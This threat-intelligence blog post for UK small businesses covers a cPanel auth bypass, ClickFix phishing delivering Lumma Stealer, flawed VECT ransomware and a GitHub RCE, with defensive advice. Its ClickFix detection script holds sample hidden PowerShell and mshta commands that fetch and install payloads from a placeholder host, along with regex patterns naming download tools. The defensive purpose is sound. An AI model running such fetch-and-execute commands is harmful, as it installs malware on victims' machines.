Threat Analysis: cPanel Auth Bypass, ClickFix Phishing, and VECT Ransomware — What UK SMBs Need to Know


Hello, Mauven here.

Three things in today’s threat intelligence deserve your attention if you run or advise a UK small business. None of them are hypothetical. All three are active as of 29 April 2026.

I will not cover everything in the feed. That is not the job. The job is to tell you which three things actually matter today and what they mean operationally.


1. cPanel Authentication Bypass — Emergency Patch, No Patch Means No Password Needed

cPanel has issued an emergency update to address a critical authentication bypass vulnerability affecting all versions of cPanel and WebHost Manager (WHM) prior to the latest release.

What the advisory says: update immediately.

What it does not say loudly enough: if your web hosting runs on cPanel or WHM — and a very large share of UK SMB shared and managed hosting does — and your hosting provider has not applied this patch, an attacker can access your hosting control panel without supplying any credentials. None. They do not need your password. They bypass the authentication mechanism entirely.

From a hosting control panel, an attacker can modify your website, redirect your domain, harvest contact form submissions, access email accounts, extract database credentials, and deploy malware to anyone visiting your site. This is not a privilege escalation issue. This is the keys to the front door.

Hosting providers are responsible for patching the underlying cPanel installation on shared hosting. You cannot apply this patch yourself. What you can do is ask — today, not next week — whether your provider has applied the emergency update. If they cannot tell you, that is your answer.

If you self-host on a VPS with your own cPanel installation, you are responsible. Log in to WHM, check your version, and run the update from the Update Preferences section.

What to do:

  • Contact your hosting provider and ask specifically whether the cPanel/WHM emergency patch released on 29 April 2026 has been applied to servers hosting your account.
  • If you manage your own cPanel/WHM installation, update immediately via the WHM Update Center.
  • Review your hosting control panel login logs for any anomalous access. If you do not know how to do this, ask your provider.

2. ClickFix Phishing — Lumma Stealer via PowerShell, No Attachment Required

ClickFix-style phishing campaigns are continuing to mature, and the variant currently in active distribution is deploying Lumma Stealer via a multi-stage chain that begins with social engineering and ends with credential theft from browsers, email clients, and cryptocurrency wallets.

The mechanics are worth understanding because they defeat the usual advice about “do not open attachments”.

The victim receives a message — this variant uses delivery-themed lures and fake verification pages — that instructs them to complete a CAPTCHA or verification step. The page presents a dialog that asks the user to press Windows key + R, then paste a command into the Run box. The command is already in the clipboard, placed there by the page. The user follows the instructions. PowerShell executes. An obfuscated download fetches a malicious MSI installer from a remote server. The installer uses DLL sideloading — renaming legitimate binaries to execute malicious ones — to deploy HijackLoader, which in turn drops Lumma Stealer.

Lumma Stealer then harvests saved passwords from browsers, session tokens, two-factor authentication codes from authenticator apps, and cryptocurrency wallet files. It exfiltrates everything before the user has any indication something has gone wrong.

The reason this is particularly relevant to UK SMBs right now: Proofpoint has reported over a hundred tax-themed campaigns in 2026, with a notable increase in payloads delivered through remote monitoring and management (RMM) tools and similar social-engineering lures. ClickFix variants slot neatly into that pattern. If your staff are processing anything finance-related — payroll, VAT returns, supplier invoices — they are the target audience for these lures right now.

Proofpoint’s reporting also notes that DHL brand impersonation is active, with an eleven-step credential harvesting chain targeting consumer and business users through spoofed shipment notifications. If anyone in your business is expecting a delivery and clicks a notification email, they are a potential victim.

What the threat intelligence does not say clearly enough: your standard email filtering is increasingly insufficient against these campaigns because the initial email itself may contain no malicious link. The malicious action happens client-side, triggered by the user following on-screen instructions that appear entirely legitimate.

What to do:

  • Brief staff this week on the specific mechanic: if any webpage asks you to press Windows key + R and paste something, that is an attack. It does not matter how legitimate the page looks.
  • Restrict PowerShell execution via group policy or Windows Defender Application Control where staff do not have a legitimate need for it. In most small business environments, that is most staff.
  • Ensure browser credential saving is disabled in favour of a managed password manager. Lumma Stealer’s primary harvest is saved browser passwords.
  • Review whether any staff have received DHL-branded notification emails recently and have not flagged them.
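One endpoint-side check for the Run-box mechanic described above, added here as an example and not taken from the post or from any vendor's product: it scans process-creation records (Sysmon Event ID 1 or Security 4688 style fields) for script interpreters spawned directly by explorer.exe, which is how a paste into Win+R appears, and flags those whose command line carries download-and-execute indicators. The sample records are constructed and the hosts are placeholders.

```python
import re

# Constructed process-creation records in the shape of Sysmon Event ID 1 / Security 4688
# fields (ParentImage, Image, CommandLine). Hosts are placeholders, not real indicators.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c \"iwr http://example.invalid/v.msi -OutFile "
                "$env:TEMP\\v.msi; msiexec /i $env:TEMP\\v.msi /qn\""},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://example.invalid/verify"},
    {"parent": r"C:\Program Files\Vendor\agent.exe",          # legitimate agent, not Run box
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -ExecutionPolicy Bypass -File C:\\ProgramData\\Vendor\\inventory.ps1"},
    {"parent": r"C:\Windows\explorer.exe",                     # Run box, but nothing remote
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c ipconfig /all"},
]

# Interpreters a Run-box paste would typically invoke.
INTERPRETERS = re.compile(r"\\(powershell|pwsh|cmd|mshta|wscript|cscript)\.exe$", re.I)

# Indicators that the pasted command fetches and executes remote content.
INDICATORS = {
    "remote_url": re.compile(r"https?://", re.I),
    "web_download": re.compile(r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget|certutil)\b", re.I),
    "inline_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "encoded_cmd": re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\s", re.I),
    "hidden_window": re.compile(r"(^|\s)-w(indowstyle)?\s+hidden\b", re.I),
    "msi_install": re.compile(r"\bmsiexec\b.*\s/i\b", re.I),
}

def classify(event):
    """Return the indicator names hit, or [] if the event is not ClickFix-like.
    The Run dialog is hosted by explorer.exe, so a paste into Win+R shows up as
    explorer.exe spawning the interpreter directly; scripts started by an agent,
    the scheduler or a logon script have a different parent and are not flagged."""
    if not event["parent"].lower().endswith("\\explorer.exe"):
        return []
    if not INTERPRETERS.search(event["image"]):
        return []
    return [name for name, rx in INDICATORS.items() if rx.search(event["cmdline"])]

def hunt(events):
    """Map each suspicious command line to its indicators; benign events are omitted."""
    return {e["cmdline"]: hits for e in events if (hits := classify(e))}
```

The same parent/child relationship can be expressed as an EDR or SIEM query; the per-user RunMRU registry key is the corresponding on-disk artifact if no process telemetry is collected.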

3. VECT 2.0 Ransomware — A Wiper in Disguise

Check Point Research has published a detailed technical analysis of VECT 2.0 ransomware, which targets Windows, Linux, and ESXi platforms. The finding that matters operationally is this: VECT has a fundamental encryption implementation error that causes files larger than 128 KB to be permanently destroyed rather than encrypted.

The ransomware uses the ChaCha20-IETF cipher but saves only one of the four nonces required to decrypt large files. Those files cannot be recovered. Not by you, not by the attackers, not by any recovery tool. They are gone.

This matters in a way that is not captured by standard ransomware threat assessments. When a ransomware operator tells you they can decrypt your files in exchange for payment, they are, in this case, wrong. The decryption key they hold is incomplete. VECT is functionally a wiper for anything above the 128 KB threshold — which includes most business documents, database files, virtual machine images, and backups stored on accessible drives.
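The flaw described above, as an added example written for this post rather than code from Check Point's analysis or from the malware itself: a compact RFC 8439 ChaCha20-IETF implementation, plus a simplified model in which a large file is encrypted in four chunks under four random nonces while only the first nonce is kept. The four-chunk layout, chunk size and "footer" are assumptions for illustration, not VECT's real file format.

```python
import os
import struct

def _rotl(v, c):
    return ((v << c) & 0xffffffff) | (v >> (32 - c))

def _qr(s, a, b, c, d):
    s[a] = (s[a] + s[b]) & 0xffffffff; s[d] = _rotl(s[d] ^ s[a], 16)
    s[c] = (s[c] + s[d]) & 0xffffffff; s[b] = _rotl(s[b] ^ s[c], 12)
    s[a] = (s[a] + s[b]) & 0xffffffff; s[d] = _rotl(s[d] ^ s[a], 8)
    s[c] = (s[c] + s[d]) & 0xffffffff; s[b] = _rotl(s[b] ^ s[c], 7)

def chacha20_block(key, counter, nonce):
    """One 64-byte keystream block of ChaCha20-IETF (RFC 8439: 256-bit key, 96-bit nonce)."""
    init = [0x61707865, 0x3320646e, 0x79622d32, 0x6b206574]
    init += list(struct.unpack('<8I', key)) + [counter] + list(struct.unpack('<3I', nonce))
    w = list(init)
    for _ in range(10):
        _qr(w, 0, 4, 8, 12); _qr(w, 1, 5, 9, 13); _qr(w, 2, 6, 10, 14); _qr(w, 3, 7, 11, 15)
        _qr(w, 0, 5, 10, 15); _qr(w, 1, 6, 11, 12); _qr(w, 2, 7, 8, 13); _qr(w, 3, 4, 9, 14)
    return struct.pack('<16I', *[(w[i] + init[i]) & 0xffffffff for i in range(16)])

def chacha20_xor(key, nonce, data, counter=0):
    """Encrypt or decrypt (same operation): XOR data with the keystream."""
    out = bytearray()
    for off in range(0, len(data), 64):
        ks = chacha20_block(key, counter + off // 64, nonce)
        out += bytes(p ^ k for p, k in zip(data[off:off + 64], ks))
    return bytes(out)

CHUNK = 16 * 1024   # constructed: four chunks, scaled down from real file sizes for speed

def lossy_encrypt(key, plaintext):
    """Model of the flaw: each chunk is encrypted under its own random nonce,
    but only the first nonce is written alongside the ciphertext."""
    nonces = [os.urandom(12) for _ in range(4)]
    chunks = [plaintext[i * CHUNK:(i + 1) * CHUNK] for i in range(4)]
    ct = b''.join(chacha20_xor(key, n, c) for n, c in zip(nonces, chunks))
    return ct, nonces[0]        # nonces[1:] are dropped and exist nowhere else

def attempt_recovery(key, ciphertext, saved_nonce, original):
    """What a decryptor holding the correct key and the one saved nonce gets back."""
    return [chacha20_xor(key, saved_nonce, ciphertext[i * CHUNK:(i + 1) * CHUNK])
            == original[i * CHUNK:(i + 1) * CHUNK] for i in range(4)]

def demo():
    key, original = os.urandom(32), os.urandom(4 * CHUNK)   # constructed key and "document"
    ct, nonce0 = lossy_encrypt(key, original)
    return attempt_recovery(key, ct, nonce0, original)      # -> [True, False, False, False]
```

Only the chunk whose nonce survived comes back; the other three decrypt to noise even with the attacker's own key, which is why payment cannot restore them.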

The ransomware operates as a Ransomware-as-a-Service offering, meaning access is sold to affiliates who may not be aware of this flaw. Attribution is to a group called TeamPCP. The advisory notes multi-platform capability, including ESXi targeting — which is relevant for any business running virtualised servers.

This variant reinforces something that has been true for years but is worth repeating in this specific context: paying the ransom is not a recovery strategy. It was never a reliable strategy, and in the case of VECT it is definitively not one.

If you are hit by VECT, your recovery depends entirely on whether your backups are intact, offline, and have been tested. Not backed up to the same server. Not backed up to a network drive that is mapped at the time of infection. Offline. Tested.

What to do:

  • Verify your backup strategy today. Specifically: are your most recent backups stored offline or air-gapped from your live environment? When was the last time you tested a restore?
  • If you use ESXi or similar virtualisation, ensure your VM snapshots are not the only backup you have. VECT specifically targets ESXi platforms.
  • Ensure your incident response plan — even an informal one — includes the scenario where the ransom payment will not recover your data. The decision-making path should not begin with “shall we pay” when files may already be unrecoverable.

Brief Note: GitHub RCE — Relevant if Your Business Uses GitHub

GitHub patched CVE-2026-3854 in early March — a critical remote code execution flaw in GitHub Enterprise Server that could have allowed attackers to access millions of private repositories via a single command. The full analysis was published today by BleepingComputer.

This is already patched. If you use GitHub Enterprise Server on-premises, confirm you are on a patched version. If you use GitHub’s cloud service, GitHub handled it. The reason to note it here is that any business using GitHub for code, documentation, or internal tooling should audit who has access to private repositories and whether those repositories contain credentials, API keys, or configuration files that should not be there. Incidents like this are a prompt to tidy up, not just to patch.


Sources

  • BleepingComputer, "cPanel, WHM emergency update fixes critical auth bypass bug": https://www.bleepingcomputer.com/news/security/cpanel-whm-emergency-update-fixes-critical-auth-bypass-bug/
  • AlienVault OTX, "ClickFix-style phishing: Lumma Stealer via PowerShell and HijackLoader": https://otx.alienvault.com
  • Check Point Research, "VECT: Ransomware by design, Wiper by accident": https://research.checkpoint.com/2026/vect-ransomware-by-design-wiper-by-accident/
  • Proofpoint, "Security brief: tax scams aim to steal funds from taxpayers": https://www.proofpoint.com/us/blog/threat-insight/security-brief-tax-scams-aim-steal-funds-taxpayers
  • BleepingComputer, "GitHub fixes RCE flaw that gave access to millions of private repos": https://www.bleepingcomputer.com/news/security/github-fixes-rce-flaw-that-gave-access-to-millions-of-private-repos/
  • Forcepoint X-Labs, "Inside a Fake DHL Campaign Built to Steal Credentials": https://www.forcepoint.com/blog/x-labs/fake-dhl-phishing-campaign-credential-theft

Filed under

  • smb-security
  • uk-business
  • credential-theft
  • ransomware-groups
  • social-engineering
  • vendor-risk
  • incident-response